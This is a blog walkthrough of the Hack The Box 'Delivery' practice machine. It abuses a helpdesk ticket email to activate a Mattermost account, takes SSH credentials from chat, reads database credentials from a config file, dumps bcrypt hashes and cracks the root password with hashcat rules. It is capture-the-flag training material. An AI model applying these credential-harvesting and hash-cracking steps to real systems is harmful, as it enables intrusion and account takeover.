3rd August 2021
Hack The Box Delivery Write-Up by T13nn3s

Hack The Box Write-Up Delivery

As always we start with nmap… but it can take a while so I’ve already ran it

ippsec

About Delivery

In this post, I’m writing a write-up for the machine Delivery from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Delivery is an ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10, and submitting the root flag your points will be raised by 15.

Foothold
The Nmap port scan shows two open ports: 22/tcp and 80/tcp. The port scan reveals that this machine is running on Debian 10 and that there is an Nginx web server running on this machine. On the enumeration of 80/tcp, we can discover the hostname helpdesk.delivery.htb and a login page on http://delivery.htb:8065/login through Mattermost. Through the helpdesk, we can create a ticket and through the account creation on Mattermost with the use of the email address from the ticket system, we are able to activate the user account and get access to Mattermost.

User
Through Mattermost, we have access to the chat’s and we are able to read the credentials for the user account maildeliverer. With this account, we are able to get an SSH session and read the user flag.

Root
Through linpeas.sh, we can discover the directory /opt/mattermost. In this directory, through the config.json file, we can find the credentials for the user mmuser to access MySQL. Through MySQL, we can read access the database mattermost database, and read various password hashes. With hashcat, we can crack those hashes and get the password for the user account root.

Machine IP

Hack The Box Delivery Write-Up by T13nn3s
Hack The Box Delivery Write-Up by T13nn3s
Hack The Box Delivery Machine IP and maker
Hack The Box Delivery Machine IP and maker

Reconnaissance

As always we start the machine with a port scan with Nmap. But, it can take a while, I’ve not already run it. I need to learn more from ippsec 🙂

~$  nmap -sC -sV -oA ./nmap/10.10.10.222 10.10.10.222 

The results.

 Starting Nmap 7.90SVN ( https://nmap.org ) at 2021-01-25 20:35 CET
 Nmap scan report for 10.10.10.222
 Host is up (0.045s latency).
 Not shown: 998 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Welcome
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 

 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 23.55 seconds 

The Nmap port scan had discovered two open ports. The first port 22/tcp is the default SSH port. Through this port, we can see that we are dealing with a Debian 10 operating system. The second port 80/tcp is the default HTTP port. Behind this port, there is a webserver running on Nginx 1.14.2. At this time of writing, I know that this is not the latest version of Nginx. The web server is returning the HTTP-title Welcome. In any case, we are welcomed.

Enumeration Web Server

Let’s start with the enumeration of the web server. We can visit the website through http://10.10.10.222.

Hack The Box Delivery website
http://10.10.10.222

Through the http://10.10.10.222/#contact-us we can find the domain name delivery.htb. Let’s add this domain name to our /etc/hosts file. On this webpage, we can discover at least two interesting things. There is a URL leading to the hostname helpdesk.delivery.htb. And we can find an URL on this page, which is leading us to http://delivery.htb:8065/login. First, we can add the founded hostname to our hosts’ file and then we can check both of the URLs.

Enumeration Mattermost

Hack The Box Delivery Mattermost
http://delivery.htb:8065/login

Let’s create a user account and let’s see what we can do with this account. I’ve registered an account with the following credentials.

Email: [email protected]
Username: T13nn3s
Password: [email protected]

After the registration of the user account, I’ve received a message that there is a registration email message sent. So, before we can log in with this user account, we need to confirm the account. I’ve tried to login, but it’s not working.

Hack The Box Delivery account confirmation
Account verification needed

Enumeration Support Center

Hmm, maybe the Support Center can help me with the verification of my account on Mattermost. Let’s check http://helpdesk.delivery.htb. We’re landing on the webpage as shown below.

Hack The Box Delivery Support Center
http://helpdesk.delivery.htb/

We are default logged in as Guest. We can create a user account, but unfortunately, we have the same “problem” as the Mattermost service, we need to verify the account. As we are looking closer at the email placeholder on the Check Ticket Status page, we can discover the domain osticket.com. Let’s try to create a ticket with the use of this email address, and maybe we can bypass the verification of the account. We have created a ticket with the email address [email protected], the ticket has the ticket number: 3750352. There is also an email address created [email protected]. Let’s try to read the status of this ticket.

Hack The Box Delivery Check Ticket Status
Check Ticket Status

We can read the ticket and we can update this ticket. Nice! The other exciting thing is, there is a message visible with a sort of invitation to create a user account with the email address [email protected]. But, we need to verify this account. But, no problem. We can create tickets, now we have to play some around with it. On the ticket creation, there is an email account created with the ticket number in the email address. With this email account, we can verify our account Mattermost. Let’s create an user account on Mattermost with the email address [email protected].

Create account with the following details:

Hack The Box Delivery Mattermost account creation
Account creation on Mattermost

If we check our ticket, we see that the ticket is updated with the activation URL.

Hack The Box Delivery Mattermost account activation
Activation mail

Intrusion

Access to Mattermost

After using the activation URL, our account is activated and we can login in Mattermost.

 Hack The Box Delivery Mattermost Internal Group
Mattermost Public Channel Internal

We have been added to the public channel Internal. We see interesting information being exchanged here. For example, we can find the credentials below here.

maildeliverer:Youve_G0t_Mail!
??:PleaseSubscribe!

To get further access to this machine. We can try using the founded credentials to get access through SSH.

SSH access as maildeliverer

After the first try we got directly access through SSH with the user account maildeliverer. We are able to directly read the user flag.

~$  ssh [email protected]
[email protected]'s password: 
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jan 29 16:48:36 2021 from 10.10.16.144
[email protected]:~$ cat user.txt 
b55f6266fa1b0d826efca08cfb01e983
[email protected]:~$ 

Privilege Escalation

Enumeration

Let’s download linpeas.sh to this machine and run it. The output shows that there are binary process permissions in the /opt directory.

[email protected]:/tmp$ bash linpeash.sh 
...
[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
1.5M -rwxr-xr-x 1 root       root       1.5M Oct 24 14:44 /lib/systemd/systemd
144K -rwxr-xr-x 1 root       root       143K Oct 24 14:44 /lib/systemd/systemd-journald
228K -rwxr-xr-x 1 root       root       227K Oct 24 14:44 /lib/systemd/systemd-logind
56K -rwxr-xr-x 1 root       root        55K Oct 24 14:44 /lib/systemd/systemd-timesyncd
664K -rwxr-xr-x 1 root       root       663K Oct 24 14:44 /lib/systemd/systemd-udevd
85M -rwxrwxr-x 1 mattermost mattermost  85M Dec 18 08:53 /opt/mattermost/bin/mattermost
64K -rwxr-xr-x 1 root       root        64K Jan 10  2019 /sbin/agetty
0 lrwxrwxrwx 1 root       root         20 Oct 24 14:44 /sbin/init -> /lib/systemd/systemd
236K -rwxr-xr-x 1 root       root       236K Jul  5  2020 /usr/bin/dbus-daemon[0m
132K -rwxr-xr-x 1 root       root       129K Oct  9  2019 /usr/bin/VGAuthService
56K -rwxr-xr-x 1 root       root        56K Oct  9  2019 /usr/bin/vmtoolsd
56K -rwxr-xr-x 1 root       root        55K Oct 11  2019 /usr/sbin/cron
184K -rwxr-xr-x 1 root       root       183K Apr 10  2019 /usr/sbin/cups-browsed
448K -rwxr-xr-x 1 root       root       447K Nov 28 06:09 /usr/sbin/cupsd
20M -rwxr-xr-x 1 root       root        20M Nov 25 04:50 /usr/sbin/mysqld
688K -rwxr-xr-x 1 root       root       686K Feb 26  2019 /usr/sbin/rsyslogd
792K -rwxr-xr-x 1 root       root       789K Jan 31  2020 /usr/sbin/sshd
...

Let’s check the contents from the directory /opt/mattermost. Maybe we can find some useful information here.

[email protected]:/tmp$ cd /opt/mattermost/
[email protected]:/opt/mattermost$ ls -la
total 288
drwxrwxr-x 12 mattermost mattermost   4096 Dec 26 09:24 .
drwxr-xr-x  3 root       root         4096 Dec 26 09:22 ..
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:53 bin
drwxrwxr-x  7 mattermost mattermost   4096 Dec 26 09:24 client
drwxrwxr-x  2 mattermost mattermost   4096 Dec 26 09:23 config
drwxrwxr-x  3 mattermost mattermost   4096 Jan 29 05:01 data
-rw-rw-r--  1 mattermost mattermost   2052 Dec 18 08:52 ENTERPRISE-EDITION-LICENSE.txt
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:52 fonts
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:52 i18n
drwxrwxr-x  2 mattermost mattermost   4096 Jan 29 16:47 logs
-rw-rw-r--  1 mattermost mattermost    898 Dec 18 08:52 manifest.txt
-rw-rw-r--  1 mattermost mattermost 229264 Dec 18 08:52 NOTICE.txt
drwxr--r--  5 mattermost mattermost   4096 Jan 29 05:04 plugins
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:53 prepackaged_plugins
-rw-rw-r--  1 mattermost mattermost   6262 Dec 18 08:52 README.md
drwxrwxr-x  2 mattermost mattermost   4096 Dec 18 08:52 templates

After some time of searching in this directory, we’ve found what seems to be the username and password for MySQL in the file /opt/mattermost/config/config.json.

[email protected]:/opt/mattermost/config$ cat config.json  
...
"SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:[email protected](127.0.0.1:3306)/mattermost
charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
    }, 
...

We are able to connect to the MariaDB with the founded credentials.

Enumeration MySQL

[email protected]:/opt/mattermost/config$ mysql -u mmuser -pCrack_The_MM_Admin_PW -e "show databases"
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
[email protected]:/opt/mattermost/config$

Let’s connect to the database mattermost with use mattermost;, and list all the tables with show tables;.

MariaDB [(none)]> use mattermost
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed

MariaDB [mattermost]> show tables;
------------------------+                                                                                                                                                                    
| Tables_in_mattermost   |                                                                                                                                                                    
+------------------------+                                                                                                                                                                    
| Audits                 |                                                                                                                                                                    
| Bots                   |                                                                                                                                                                    
| ChannelMemberHistory   |
...
| UploadSessions         |
| UserAccessTokens       |
| UserGroups             |
| UserTermsOfService     |
| Users                  |
+------------------------+

There is an interesting table, called Users, with the command select * from Users; we can read the contents from this table. From the output, we can create a table with the interesting information.

IdUsernamePasswordEmailRole
6akd5cxuhfgrbny81nj55au4zac3ecacacc7b94f909d04dbfd308a9b93$2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK[email protected]system_user
6wkx1ggn63r7f8q1hpzp7t4iiy5b785171bfb34762a933e127630c4860$2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G[email protected]system_user
dijg7mcf4tf3xrgxi5ntqdefmaroot$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO[email protected]system_admin system_user
hatotzdacb8mbe95hm4ei8i7nyff0a21fc6fc2488195e16ea854c963ee$2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq[email protected]system_user
kxxg51bs7t8ujb1bp1gciur6aetechno$2a$10$SlpOZeDnPB3p3s6uzqIsuO.nertWPg/bDsePhTg64iRxWB3hcuSF6[email protected]system_user
n9magehhzincig4mm97xyft9sc9ecfb4be145d47fda0724f697f35ffaf$2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm[email protected]system_user

We have only the password hashes, we need to crack those hashes. From the Mattermost chat, we can find the hint to our next step. Those hashes are not in the RockYou database. We need to use hashcat with a ruleset to crack these hashes.

Password crack with Hashcat with rules

On my host, I got an AMD Radeon R9 390 Graphics Card, which can be used for cracking those hashes. To crack those hashes we need to install hashcat. We only need the password for the user account [email protected]. So, I added this hash to the file hashes.txt. The hash is starting with $2a$10$, this means that this hash is possibly encrypted with Bcrypt. This encryption is based on the Blowfish Cipher.

Hashcat parameters
For cracking this password, we’re using these parameters:
-a 3 Attack mode for brute-forcing
-m 3200 hash mode for supporting bcrypt $2*$, Blowfish (Unix).

Are we just gonna crack the hash? From the Mattermost chat, we know that the password was PleaseSubscribe!Let’s add this password to the wordlist.txt. We know that this password is updated, let’s try to brute-force the password using this ruleset: best64.rule. This ruleset is default coming with hashcat.

C:\Users\T13nn3s\htb\hashcat-6.1.1\hashcat-6.1.1> hashcat.exe -a 0 -m 3200 hashes.txt wordlist.txt -r "C:\Users\T13nn3s\htb\hashcat-6.1.1\hashcat-6.1.1\rules\best64.rule"
...
[s]tatus [p]ause [b]ypass heckpoint [q]uit =>
Session……….: hashcat
Status………..: Running
Hash.Name……..: bcrypt $2$, Blowfish (Unix) Hash.Target……: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v…JwgjjO Time.Started…..: Mon Feb 01 20:50:30 2021 (1 min, 9 secs) Time.Estimated…: Mon Feb 01 20:55:02 2021 (3 mins, 23 secs) Guess.Base…….: File (wordlist.txt) Guess.Mod……..: Rules (C:\Users\Martien van Dijk\Downloads\hashcat-6.1.1\hashcat-6.1.1/rules/best64.rule) Guess.Queue……: 1/1 (100.00%) Speed.#1………:        0 H/s (0.00ms) @ Accel:2 Loops:2 Thr:8 Vec:1 Speed.#2………:        0 H/s (6.31ms) @ Accel:2 Loops:2 Thr:8 Vec:1 Speed.#………:        0 H/s
Recovered……..: 0/1 (0.00%) Digests
Progress………: 19/77 (24.68%)
Rejected………: 0/19 (0.00%)
Restore.Point….: 0/1 (0.00%)
Restore.Sub.#1…: Salt:0 Amplifier:0-0 Iteration:0-2
Restore.Sub.#2…: Salt:0 Amplifier:19-20 Iteration:532-534
Candidates.#1….: [Copying]
Candidates.#2….: PleaseSubscribe!13 -> PleaseSubscribe!13
Hardware.Mon.#1..: Util: 77% Core:1025MHz Mem:1500MHz Bus:16
Hardware.Mon.#2..: Util:100% Core:1025MHz Mem:1500MHz Bus:16

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Session……….: hashcat
Status………..: Cracked
Hash.Name……..: bcrypt $2$, Blowfish (Unix) Hash.Target……: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v…JwgjjO Time.Started…..: Mon Feb 01 20:50:30 2021 (1 min, 14 secs) Time.Estimated…: Mon Feb 01 20:51:44 2021 (0 secs) Guess.Base…….: File (wordlist.txt) Guess.Mod……..: Rules (C:\Users\Martien van Dijk\Downloads\hashcat-6.1.1\hashcat-6.1.1/rules/best64.rule) Guess.Queue……: 1/1 (100.00%) Speed.#1………:        0 H/s (0.00ms) @ Accel:2 Loops:2 Thr:8 Vec:1 Speed.#2………:        0 H/s (6.31ms) @ Accel:2 Loops:2 Thr:8 Vec:1 Speed.#………:        0 H/s
Recovered……..: 1/1 (100.00%) Digests
Progress………: 21/77 (27.27%)
Rejected………: 0/21 (0.00%)
Restore.Point….: 0/1 (0.00%)
Restore.Sub.#1…: Salt:0 Amplifier:0-0 Iteration:0-2
Restore.Sub.#2…: Salt:0 Amplifier:20-21 Iteration:1022-1024
Candidates.#1….: [Copying]
Candidates.#2….: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util:  0% Core:1025MHz Mem:1500MHz Bus:16
Hardware.Mon.#2..: Util:  9% Core:1025MHz Mem:1500MHz Bus:16
Started: Mon Feb 01 20:50:10 2021
Stopped: Mon Feb 01 20:51:46 2021

Own Delivery

We are now entering the last phase of rooting this machine, and that’s switching to the user account root and taking the root flag.

[email protected]:/opt/mattermost/config$ su - root
Password: 
[email protected]:~# cat root.txt 
84f2c360a4f254370c2f4280b0624431

Delivery rooted! Well, that was a nice machine ippsec. Learned some new things. Did you like this write-up, please consider spending a respect point. I really appreciate it, my HTB profile: https://app.hackthebox.eu/profile/224856.

This blog is free for charge. I do not place any advertisements on this website. If you want to support me, you can give me a cup of coffee; Black, no sugar.

Buy me a coffeeBuy me a coffee

Happy Hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *